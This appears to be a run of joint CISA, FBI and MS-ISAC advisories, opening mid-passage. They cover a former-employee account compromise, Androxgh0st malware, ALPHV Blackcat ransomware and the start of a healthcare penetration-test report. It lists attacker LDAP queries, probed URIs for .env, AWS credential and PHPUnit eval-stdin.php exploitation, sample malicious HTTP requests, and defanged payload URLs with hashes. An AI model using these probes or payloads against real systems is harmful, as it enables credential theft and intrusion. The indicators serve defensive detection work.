, based on the format of the output. CISA and MS-ISAC assess the threat actor executed the LDAP queries [T1087.002] to collect user, host [T1018], and trust relationship information [T1482]. It is also believed the LDAP queries generated the text files the threat actor posted for sale on the dark web brokerage site: ad_users.txt
, ad_computers.txt
, and trustdmp.txt
.
Table 1 lists all queries that were conducted between 08:39:43-08:40:56 Coordinated Universal Time (UTC).
Query | Description |
LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) |
Collects names and metadata of users in the domain. |
LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Computer,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) |
Collects names and metadata of hosts in the domain. |
LDAP Search Scope: WholeSubtree, Base Object: dc=[REDACTED],dc=local, Search Filter: (objectCategory=CN=Trusted-Domain,CN=Schema,CN=Configuration,DC=[REDACTED],DC=local) |
Collects trust information in the domain. |
LDAP Search Scope: WholeSubtree, Base Object: DC=[REDACTED],DC=local, Search Filter: ( & ( & (sAMAccountType=805306368) (servicePrincipalName=*) ( ! (sAMAccountName=krbtgt) ) ( ! (userAccountControl&2) ) ) (adminCount=1) ) |
Collects Domain Administrators and Service Principals in the domain. |
Through the VM connection, the threat actor was observed authenticating to various services on the victim organization’s network from the USER1
and USER2
administrative accounts. In all instances, the threat actor authenticated to the Common Internet File Service (CIFS) on various endpoints [T1078.002],[T1021.002]—a protocol used for providing shared access to files and printers between machines on the network. This was likely used for file, folder, and directory discovery [T1083], and assessed to be executed in an automated manner.
USER1
authenticated to four services, presumably for the purpose of network and service discovery [T1046].USER2
authenticated to twelve services. Note: This account had administrative privileges to both the on-premises network and Azure tenant.See Tables 2-9 for all referenced threat actor’s tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title | ID | Use |
---|---|---|
Gather Victim Identity Information: Credentials |
The actor likely gathered |
Technique Title | ID | Use |
---|---|---|
Valid Accounts: Domain Accounts |
The actor gained initial access through the compromised account of a former employee with administrative privileges ( |
Technique Title | ID | Use |
---|---|---|
External Remote Services |
The actor connected a VM via the victim’s VPN to blend in with legitimate traffic to evade detection. |
Technique Title | ID | Use |
---|---|---|
Valid Accounts: Domain Accounts |
The actor authenticated to multiple services from a compromised Global Domain Administrator account ( |
|
Valid Accounts: Cloud Accounts |
The actor used a compromised account ( |
Technique Title | ID | Use |
---|---|---|
Unsecured Credentials: Credentials in Files |
The actor likely obtained |
Technique Title | ID | Use |
Account Discovery: Domain Account |
Through the VM connection, the actor executed LDAP queries of the AD. |
|
Remote System Discovery |
Through the VM connection, the actor executed LDAP queries to collect user and host information. |
|
Domain Trust Discovery |
Through the VM connection, the actor executed LDAP queries to collect trust relationship information. |
|
File and Directory Discovery |
The actor authenticated to the CIFS on various endpoints likely for the purpose of file, folder, and directory discovery. |
|
Network Service Discovery |
The actor used the compromised |
Technique Title | ID | Use |
---|---|---|
Remote Services |
The actor connected from an unknown VM and authenticated to multiple services via the |
|
Remote Services: Cloud Services |
The actor used the |
|
Remote Services: SMB/Windows Admin Shares |
The actor used compromised accounts to interact with a remote network share using Server Message Block. |
Technique Title | ID | Use |
---|---|---|
Data from Information Repositories: SharePoint |
The actor likely obtained the |
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST), which apply to all critical infrastructure organizations and network defenders. The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
The threat actor gained access to the network via compromised administrator accounts that did not have MFA enabled. The compromised USER2
Global Domain Administrator account could have enabled the threat actor to move laterally from the on-premises environment to the Azure tenant. In response to the incident, the victim organization removed administrator privileges for USER2
. Additionally, the victim organization disabled unnecessary administrator accounts and enabled MFA for all administrator accounts. To prevent similar compromises, CISA and MS-ISAC recommend the following:
Unnecessary accounts, software, and services in the network create additional vectors for a threat actor to compromise. CISA and MS-ISAC recommend the following:
By default, in Azure AD all users can register and manage all aspects of applications they create. Users can also determine and approve what organizational data and services the application can access. These default settings can enable a threat actor to access sensitive information and move laterally in the network. In addition, users who create an Azure AD automatically become the Global Administrator for that tenant. This could allow a threat actor to escalate privileges to execute malicious actions. CISA and MS-ISAC recommend the following:
CISA created the Secure Cloud and Business Applications (SCuBA) assessment tool to help Federal Civilian Executive Branch (FCEB) agencies to verify that a M365 tenant configuration conforms to a minimal viable secure configuration baseline. Although the SCuBA assessment tool was developed for FCEB, other organizations can benefit from its output. CISA and MS-ISAC recommend the following:
Conditional access policies require users who want to access a resource to complete an action. Conditional access policies also account for common signals, such as user or group memberships, IP location information, device, application, and risky sign-in behavior identified through integration with Azure AD Identity Protection.
In response to the incident, the victim organization reset passwords for all users.
CISA recommends that vendors incorporate secure by design principles and tactics into their practices, limiting the impact of threat actor techniques and strengthening the secure posture for their customers.
In addition to applying mitigations, CISA and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments
The information in this report is being provided “as is” for informational purposes only. CISA and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or MS-ISAC.
February 15, 2024: Initial version.
]]>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.
The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting[1], Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].
Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [T1595] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed) /vendor
folders are subject to malicious HTTP POST
requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.
Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.
Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level .env
file is exposed and contains credentials for accessing additional services. Note: .env
files commonly store credentials and tokens. Threat actors often target .env
files to steal these credentials within the environment variables.
If the .env
file is exposed, threat actors will issue a GET request to the /.env
URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named 0x[]
containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.
Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, XSRF-TOKEN
, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.
In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [T1083]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.
If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].
Based on investigations and analysis, the following requests are associated with Androxgh0st activity:
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/.env
[0x%5B%5D=androxgh0st]
ImmutableMultiDict([('0x[]', 'androxgh0st')])
In both previously listed POST request strings, the name androxgh0st
has been observed to be replaced with other monikers.
Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:
/info
/phpinfo
/phpinfo.php
/?phpinfo=1
/frontend_dev.php/$
/_profiler/phpinfo
/debug/default/view?panel=config
/config.json
/.json
/.git/config
/live_env
/.env.dist
/.env.save
/environments/.env.production
/.env.production.local
/.env.project
/.env.development
/.env.production
/.env.prod
/.env.development.local
/.env.old
//.env
.env
file, for example /docker/.env or /local/.env
./.aws/credentials
/aws/credentials
/.aws/config
/.git
/.test
/admin
/backend
/app
/current
/demo
/api
/backup
/beta
/cron
/develop
/Laravel
/laravel/core
/gists/cache
/test.php
/info.php
//.env
/admin-app/.env%20
/laravel/.env%20
/shared/.env%20
/.env.project%20
/apps/.env%20
/development/.env%20
/live_env%20
/.env.development%20
/.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//lib/phpunit/phpunit/Util/PHP/eval-stdin.php
//lib/phpunit/src/Util/PHP/eval-stdin.php
//lib/phpunit/Util/PHP/eval-stdin.php
//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//phpunit/phpunit/src/Util/PHP/eval-stdin.php
//phpunit/phpunit/Util/PHP/eval-stdin.php
//phpunit/src/Util/PHP/eval-stdin.php
//phpunit/Util/PHP/eval-stdin.php
//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
//vendor/phpunit/src/Util/PHP/eval-stdin.php
//vendor/phpunit/Util/PHP/eval-stdin.php
//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php
/lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/Util/PHP/eval
stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/Util/PHP/eval-stdin.php
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/Util/PHP/eval-stdin.php
/phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php
/phpunit/src/Util/PHP/eval-stdin.php
./phpunit/Util/PHP/eval-stdin.php
/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php%20
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
POST /.aws/credentials HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 20
content-type: application/x-www-form-urlencoded
0x%5B%5D=androxgh0st
GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
x-forwarded-for: 200.172.238.135
content-length: 279
hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt
59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4
hxxps://chainventures.co[.]uk/.well-known/aas
dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6
hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64
23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066
hxxps://pastebin[.]com/raw/zw0gAmpC
ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72
hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php
0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef
hxxp://45.95.147[.]236/tmp.x86_64
6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc
hxxp://main.dsn[.]ovh/dns/pwer
bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7
hxxp://tangible-drink.surge[.]sh/configx.txt
de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba
See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
Active Scanning: Vulnerability Scanning |
The threat actor scans websites for specific vulnerabilities to exploit. |
Technique Title | ID | Use |
---|---|---|
Acquire Infrastructure: Botnet |
The threat actor establishes a botnet to identify and exploit victims. |
|
Acquire Infrastructure: Web Services |
The threat actor creates new AWS instances to use for scanning. |
Technique Title | ID | Use |
---|---|---|
Exploit Public-Facing Application |
The threat actor exploits CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter: Python |
The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files. |
Technique Title | ID | Use |
---|---|---|
Valid Accounts |
The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials. |
|
Server Software Component: Web Shell |
The threat actor deploys web shells to maintain persistent access to systems. |
|
Create Account |
The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website. |
Technique Title | ID | Use |
Obfuscated Files or Information: Command Obfuscation |
The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie. |
Technique Title | ID | Use |
Credential Access |
The threat actor can access the application key of the Laravel application on the site. |
|
Unsecured Credentials: Credentials in Files |
The threat actor targets .env files that contain confidential credential information. |
Technique Title | ID | Use |
File and Directory Discovery |
The threat actor can identify URLs for files outside root directory through a path traversal attack. |
|
Network Service Discovery |
The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning. |
Technique Title | ID | Use |
Email Collection |
The threat actor interacts with application programming interfaces (APIs) to gather information. |
Technique Title | ID | Use |
Ingress Tool Transfer |
The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website. |
The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.
.env
files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file..env
file for unauthorized access or use./vendor/phpunit/phpunit/src/Util/PHP
folder..php
file.In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.
When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
Amazon contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
January 16, 2024: Initial version.
]]>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as Dec. 6, 2023.
This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022. Since previous reporting, ALPHV Blackcat actors released a new version of the malware, and the FBI identified over 1000 victims worldwide targeted via ransomware and/or data extortion.
FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ALPHV Blackcat ransomware and data extortion incidents.
In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMWare instances. ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations. According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
ALPHV Blackcat affiliates use advanced social engineering techniques and open source research on a company to gain initial access. Actors pose as company IT and/or helpdesk staff and use phone calls or SMS messages [T1598] to obtain credentials from employees to access the target network [T1586]. ALPHV Blackcat affiliates use uniform resource locators (URLs) to live-chat with victims to convey demands and initiate processes to restore the victims’ encrypted files.
After gaining access to a victim network, ALPHV Blackcat affiliates deploy remote access software such as AnyDesk, Mega sync, and Splashtop in preparation of data exfiltration. After gaining access to networks, ALPHV Blackcat affiliates use legitimate remote access and tunneling tools, such as Plink and Ngrok [S0508]. ALPHV Blackcat affiliates claim to use Brute Ratel C4 [S1063] and Cobalt Strike [S1054] as beacons to command and control servers. ALPHV Blackcat affiliates use the open source adversary-in-the-middle attack [T1557] framework Evilginx2, which allows them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. The actors also obtain passwords from the domain controller, local network, and deleted backup servers to move laterally throughout the network [T1555].
To evade detection, affiliates employ allowlisted applications such as Metasploit. Once installed on the domain controller, the logs are cleared on the exchange server. Then Mega.nz or Dropbox are used to move, exfiltrate, and/or download victim data. The ransomware is then deployed, and the ransom note is embedded as a file.txt. According to public reporting, affiliates have additionally used POORTRY and STONESTOP to terminate security processes.
Some ALPHV Blackcat affiliates exfiltrate data after gaining access and extort victims without deploying ransomware. After exfiltrating and/or encrypting data, ALPHV Blackcat affiliates communicate with victims via TOR [S0183], Tox, email, or encrypted applications. The threat actors then delete victim data from the victim’s system.
ALPHV Blackcat affiliates offer to provide unsolicited cyber remediation advice as an incentive for payment, offering to provide victims with “vulnerability reports” and “security recommendations” detailing how they penetrated the system and how to prevent future re-victimization upon receipt of ransom payment.
See Table 1 through Table 3 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
Phishing for Information |
ALPHV Blackcat affiliates pose as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees to access the target network. |
Technique Title | ID | Use |
---|---|---|
Compromise Accounts |
ALPHV Blackcat affiliates use compromised accounts to gain access to victims’ networks. |
Technique Title | ID | Use |
---|---|---|
Obtain Credentials from Passwords Stores |
ALPHV Blackcat affiliates obtain passwords from local networks, deleted servers, and domain controllers. |
|
Adversary-in-the-Middle |
ALPHV Blackcat/ALPHV affiliates use the open-source framework Evilginx2 to obtain MFA credentials, login credentials, and session cookies for targeted networks. |
If compromise is detected, organizations should:
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the security posture for their customers.
For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.
FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on threat actor activity and to reduce the risk of compromise by ALPHV Blackcat threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
December 19, 2023: Initial version.
]]>In January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a Risk and Vulnerability Assessment (RVA) at the request of a Healthcare and Public Health (HPH) sector organization to identify vulnerabilities and areas for improvement. An RVA is a two-week penetration test of an entire organization, with one week spent on external testing and one week spent assessing the internal network. As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. The assessed organization was a large organization deploying on-premises software.
During the one-week external assessment, the assessment team did not identify any significant or exploitable conditions in externally available systems that may allow a malicious actor to easily obtain initial access to the organization’s network. Furthermore, the assessment team was unable to gain initial access to the assessed organization through phishing. However, during internal penetration testing, the team exploited misconfigurations, weak passwords, and other issues through multiple attack paths to compromise the organization’s domain.
In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the RVA team’s activities and key findings to provide network defenders and software manufacturers recommendations for improving their organizations’ and customers’ cyber posture, which reduces the impact of follow-on activity after initial access. CISA encourages the HPH sector and other critical infrastructure organizations deploying on-premises software, as well as software manufacturers, to apply the recommendations in the Mitigations section of this CSA to harden networks against malicious activity and to reduce the likelihood of domain compromise.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for tables of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. See generally 6 U.S.C. §§ 652(c)(5), 659(c)(6). After receiving a request for an RVA from the organization and coordinating high-level details of the engagement with certain personnel at the organization, CISA conducted the RVA in January 2023.
During RVAs, CISA tests the security posture of an organization’s network over a two-week period to determine the risk, vulnerability, and exploitability of systems and networks. During the first week (the external phase), the team tests public facing systems to identify exploitable vulnerabilities. During the second week (the internal phase), the team determines the susceptibility of the environment to an actor with internal access (e.g., malicious cyber actor or insider threat). The assessment team offers five services:
The assessed organization was in the HPH sector. See Table 1 for services in-scope for this RVA.
Phase | Scope | Services |
---|---|---|
External Assessment |
Publicly available HPH-organization endpoints discovered during scanning |
Penetration Testing Phishing Assessment Web Application Assessment |
Internal Assessment |
Internally available HPH-organization endpoints discovered during scanning |
Database Assessment Penetration Testing Web Application Assessment Wireless Assessment |
The CISA team did not identify any significant or exploitable conditions from penetration or web application testing that may allow a malicious actor to easily obtain initial access to the organization’s network.
The CISA team conducted phishing assessments that included both user and systems testing.
